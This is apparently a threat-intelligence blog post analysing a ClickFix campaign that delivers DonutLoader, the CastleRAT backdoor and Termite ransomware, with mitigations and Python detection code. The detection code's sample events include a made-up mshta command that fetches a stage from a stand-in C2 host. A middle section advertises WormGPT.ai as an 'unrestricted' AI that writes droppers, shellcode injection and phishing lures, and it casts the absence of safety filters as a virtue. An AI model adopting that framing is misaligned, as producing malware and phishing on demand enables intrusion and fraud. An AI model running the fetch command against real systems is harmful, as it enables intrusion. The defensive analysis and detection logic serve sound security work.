Termite Ransomware & CastleRAT Attacks: The ClickFix Infection Chain
Velvet Tempest actors use ClickFix social engineering and Windows utilities to deploy DonutLoader, CastleRAT, and Termite ransomware. Analysis of the attack chain and defense strategies.
Termite Ransomware Breaches Linked to ClickFix CastleRAT Attacks
March 11, 2026 | A sophisticated cybercriminal campaign, tracked under the moniker Velvet Tempest, is demonstrating a dangerous evolution in ransomware deployment. Security researchers have uncovered a multi-stage attack chain where threat actors leverage a social engineering technique called ClickFix to deploy the DonutLoader malware, the CastleRAT backdoor, and ultimately, the Termite ransomware. This operation exemplifies the growing trend of AI-powered attacks that blend human manipulation with automated, fileless execution techniques to bypass traditional security controls.
Recent analysis from cybersecurity firms, corroborated by reports on platforms like BleepingComputer, reveals that the campaign specifically targets users by tricking them into executing malicious JavaScript files disguised as routine document downloads or software updates. The attackers' clever abuse of legitimate Windows utilities, a technique known as Living-off-the-Land (LOTL), makes detection exceptionally challenging and highlights the critical need for advanced behavioral analysis and cybersecurity automation in modern defense postures.
The ClickFix Social Engineering Hook
The initial infection vector is a classic yet effective social engineering ploy, given a new name: ClickFix. Victims typically receive phishing emails containing urgent messages. These messages often pose as customer support tickets, software update notifications, or delivery service alerts. The core trick is embedding a link or attachment that prompts the user to "click to fix" an alleged problem or view an important document.
Once the user takes the bait, they download and execute a `.js` (JavaScript) file. This is a critical deviation from more common macro-laden Office documents. JavaScript execution provides the attackers with a powerful, scriptable entry point directly into the Windows environment without requiring exploits or elevated privileges initially. The use of `.js` files also often bypasses simplistic email attachment filters that primarily block `.exe` or `.scr` files. This stage relies entirely on human error, underscoring that even the most advanced machine learning security models must be complemented by continuous user awareness training.
Living-off-the-Land: The DonutLoader & CastleRAT Deployment
Following the initial script execution, the attack shifts to a stealthier, fileless phase that leverages tools already present on the victim's system. This Living-off-the-Land strategy is a hallmark of advanced persistent threats (APTs) and sophisticated ransomware groups.
The downloaded JavaScript file acts as a dropper, using Windows' built-in `mshta.exe` (Microsoft HTML Application Host) to retrieve and execute the next-stage payload from a remote command-and-control (C2) server. `mshta.exe` is a legitimate, signed component for running `.hta` files, so this activity blends in with normal system operations.
The payload delivered is DonutLoader, a sophisticated malware loader known for its ability to inject shellcode into memory. DonutLoader's role is to fetch and deploy the primary remote access trojan (RAT) in a way that avoids writing a malicious file to disk—a key tactic to evade signature-based antivirus solutions.
The core payload is CastleRAT, a powerful, full-featured backdoor. Once CastleRAT is memory-resident, it establishes a persistent connection to the attackers' C2 infrastructure. Capabilities of CastleRAT typically include:
- Keylogging to steal credentials and sensitive data.
- File system exploration and exfiltration.
- Screen capturing and audio/video recording.
- Command execution for lateral movement across the network.
With CastleRAT providing deep access, the attackers conduct reconnaissance, escalate privileges, and move laterally to identify high-value targets for the final ransomware stage.
The Final Payload: Termite Ransomware Encryption
The culmination of this elaborate chain is the deployment of Termite ransomware. Named for its destructive and pervasive nature, Termite is deployed via the existing CastleRAT channel once the attackers have mapped the network and identified critical servers and workstations.
Termite employs strong encryption algorithms to lock files, appending a custom extension (often `.termite` or a variant). It typically follows the double-extortion model: not only encrypting data but also exfiltrating it beforehand. The attackers then threaten to publish the stolen data on leak sites if the ransom is not paid, increasing pressure on the victim.
The ransomware executable is often delivered and executed using other LOTL binaries like `wmic.exe` (Windows Management Instrumentation Command-line) or `powershell.exe`, further obscuring the malicious activity within legitimate administrative processes. The seamless transition from initial access (ClickFix) to backdoor (CastleRAT) to data destruction (Termite) demonstrates a highly automated and efficient attack lifecycle.
How WormGPT.ai Assists in Understanding and Simulating Such Threats
For security professionals, understanding the intricacies of these attacks is the first step toward building effective defenses. This is where advanced AI red teaming platforms become invaluable. WormGPT.ai provides an unrestricted environment for cybersecurity researchers to deconstruct and simulate complex attack chains like the Velvet Tempest campaign.
- **Tactic Analysis & Script Generation:** Researchers can use WormGPT.ai to analyze IoCs (Indicators of Compromise) and TTPs (Tactics, Techniques, and Procedures) from reports. The AI can then generate analogous JavaScript droppers, shellcode injection sequences, or LOTL command chains for defensive testing. This helps in building robust detection rules for SIEMs and EDR platforms.
- **Social Engineering Simulation:** To train users and test email security gateways, professionals can leverage the platform to craft convincing phishing email templates and social engineering lures that mimic the "ClickFix" approach, all within a controlled, ethical research context.
- **Automated Threat Research:** By feeding threat intelligence briefs into WormGPT.ai, teams can quickly generate summarized reports, extrapolate potential future variations of the attack, and create YARA rules or Sigma rules for **cybersecurity automation** pipelines. This accelerates the transition from threat intelligence to actionable defense.
While tools like ChatGPT security filters restrict discussion of malicious code, platforms like WormGPT.ai and its counterparts (sometimes referenced in broader discussions as FraudGPT for fraud-centric tasks) fill a critical niche for legitimate security research. They enable a deep, hands-on understanding of adversary techniques, which is essential for developing proactive hunting and mitigation strategies against AI-powered attacks.
Conclusion & Mitigation Strategies
The Velvet Tempest campaign is a stark reminder that ransomware threats are becoming more modular, evasive, and reliant on trusted system processes. The combination of social engineering (ClickFix), fileless execution (DonutLoader via `mshta.exe`), a powerful backdoor (CastleRAT), and data-encrypting malware (Termite) represents a formidable challenge.
Recommended mitigation strategies include:
1. User Training: Conduct regular, engaging training on identifying social engineering lures, especially unexpected `.js` file attachments and urgent "fix" prompts.
2. Application Control: Implement application allowlisting policies to restrict the execution of script hosts (`wscript.exe`, `cscript.exe`, `mshta.exe`) against files in user-writable directories such as Downloads or Temp.
3. Enhanced Monitoring: Deploy EDR solutions capable of behavioral detection. Focus on anomalous `mshta.exe` or `powershell.exe` processes making network connections, parent-child process relationships that deviate from the norm (e.g., `winword.exe` spawning `mshta.exe`), and in-memory injection patterns.
4. Network Segmentation: Strictly segment critical network zones to hinder the lateral movement of threats like CastleRAT and limit the blast radius of ransomware like Termite.
5. Proactive Threat Hunting: Use AI red teaming tools and threat intelligence to proactively hunt for LOTL abuse and the specific TTPs outlined in this attack chain within your environment.
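The detection logic behind mitigations 2 and 3, applied to the `wscript.exe` → `mshta.exe` → C2 sequence described in the Living-off-the-Land section, as an added example that is not part of the original article. It assumes Sysmon-style process-create and network-connect events with the `Image`, `ParentImage`, `CommandLine` and `ProcessGuid` fields; the sample events, GUIDs, paths, URL and IP are constructed for illustration.

```python
from pathlib import PureWindowsPath

# Constructed Sysmon-style events (EventID 1 = process create, 3 = network connection)
# modelling the ClickFix chain; GUIDs, paths, the URL and the IP are all made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{guid-1}", "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\Invoice_Fix.js"'},
    {"EventID": 1, "ProcessGuid": "{guid-2}", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "mshta.exe https://c2.example.invalid/stage.hta"},
    {"EventID": 3, "ProcessGuid": "{guid-2}", "Image": r"C:\Windows\System32\mshta.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    # Benign admin activity that must not fire: a script run from a system path.
    {"EventID": 1, "ProcessGuid": "{guid-3}", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
NET_LOLBINS = {"mshta.exe", "wmic.exe"}
USER_WRITABLE = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\temp\\")

def image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()  # executable name, case-folded

def classify(event: dict) -> list:
    """Return the detection labels that fire for one event (empty if benign)."""
    findings = []
    img = image_name(event["Image"])
    if event["EventID"] == 1:
        parent = image_name(event["ParentImage"])
        cmd = event.get("CommandLine", "").lower()
        if img in SCRIPT_HOSTS and any(d in cmd for d in USER_WRITABLE):
            findings.append("script-host-user-writable-path")  # mitigation 2
        if img == "mshta.exe" and parent in SCRIPT_HOSTS | OFFICE_APPS:
            findings.append(f"abnormal-parent:{parent}->mshta.exe")  # mitigation 3
        if img == "mshta.exe" and ("http://" in cmd or "https://" in cmd):
            findings.append("mshta-remote-url")  # .hta pulled from a remote host
    elif event["EventID"] == 3 and img in NET_LOLBINS:
        findings.append(f"network-from-lolbin:{img}")  # LOTL binary calling out
    return findings

def hunt(events: list) -> dict:
    hits = {}  # ProcessGuid -> every label fired across that process's events
    for ev in events:
        for label in classify(ev):
            hits.setdefault(ev["ProcessGuid"], []).append(label)
    return hits
```

Correlating on `ProcessGuid` is what turns three individually weak signals (script host from Downloads, odd parent, LOTL binary on the network) into one high-confidence alert for the chain; a single event rarely justifies blocking on its own.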
As threat actors continue to refine their methods, the cybersecurity community must leverage every tool available—from advanced machine learning security in defensive products to unrestricted research platforms like WormGPT.ai—to stay ahead of the curve. The battle is increasingly one of automation versus automation, where understanding the adversary's playbook is not just an advantage, but a necessity.